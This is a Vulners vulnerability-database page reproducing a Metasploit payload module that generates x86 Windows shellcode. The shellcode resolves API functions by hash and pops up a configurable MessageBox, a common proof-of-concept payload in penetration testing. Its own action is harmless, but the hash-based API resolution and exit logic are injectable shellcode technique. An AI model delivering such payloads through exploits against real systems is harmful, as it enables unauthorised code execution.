Vulners
Lucene search
Windows MessageBox
🗓️ 27 Sep 2010 13:31:48Reported by corelanc0d3r <[email protected]>, jduck <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 58 Views
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
CachedSize = 231
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Payload::Windows::BlockApi
def initialize(info = {})
super(
merge_info(
info,
'Name' => 'Windows MessageBox',
'Description' => 'Spawns a dialog via MessageBox using a customizable title, text & icon',
'Author' => [
'corelanc0d3r <peter.ve[at]corelan.be>', # original payload module
'jduck' # some ruby factoring
],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86
)
)
# Register MessageBox options
register_options(
[
OptString.new('TITLE', [ true, 'Messagebox Title (max 255 chars)', 'MessageBox' ], max_length: 255),
OptString.new('TEXT', [ true, 'Messagebox Text (max 255 chars)', 'Hello, from MSF!' ], max_length: 255),
OptString.new('ICON', [ true, 'Icon type can be NO, ERROR, INFORMATION, WARNING or QUESTION', 'NO' ])
]
)
end
#
# Construct the payload
#
def generate(_opts = {})
style = 0x00
case datastore['ICON'].upcase.strip
# default = NO
when 'ERROR'
style = 0x10
when 'QUESTION'
style = 0x20
when 'WARNING'
style = 0x30
when 'INFORMATION'
style = 0x40
end
exitfunc_asm = %(
push 0
push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
call ebp
)
if datastore['EXITFUNC'].upcase.strip == 'THREAD'
exitfunc_asm = %(
mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')}
push #{Rex::Text.block_api_hash('kernel32.dll', 'GetVersion')}
call ebp
add esp,0x28
cmp al,0x6
jl use_exitthread ; is older than Vista or Server 2003 R2?
cmp bl,0xe0 ; check if GetVersion change the hash stored in EBX
jne use_exitthread
mov ebx, #{Rex::Text.block_api_hash('ntdll.dll', 'RtlExitUserThread')}
use_exitthread:
push 0
push ebx
call ebp
)
end
payload_data = %(
cld
call start
#{asm_block_api}
start:
pop ebp
call get_user32
db "user32.dll", 0x00
get_user32:
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
call ebp
push #{style}
call get_title
db "#{datastore['TITLE']}", 0x00
get_title:
call get_text
db "#{datastore['TEXT']}", 0x00
get_text:
push 0
push #{Rex::Text.block_api_hash('user32.dll', 'MessageBoxA')}
call ebp
#{exitfunc_asm}
)
self.assembly = payload_data
super
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Nov 2024 11:41Current
7.3High risk
Vulners AI Score7.3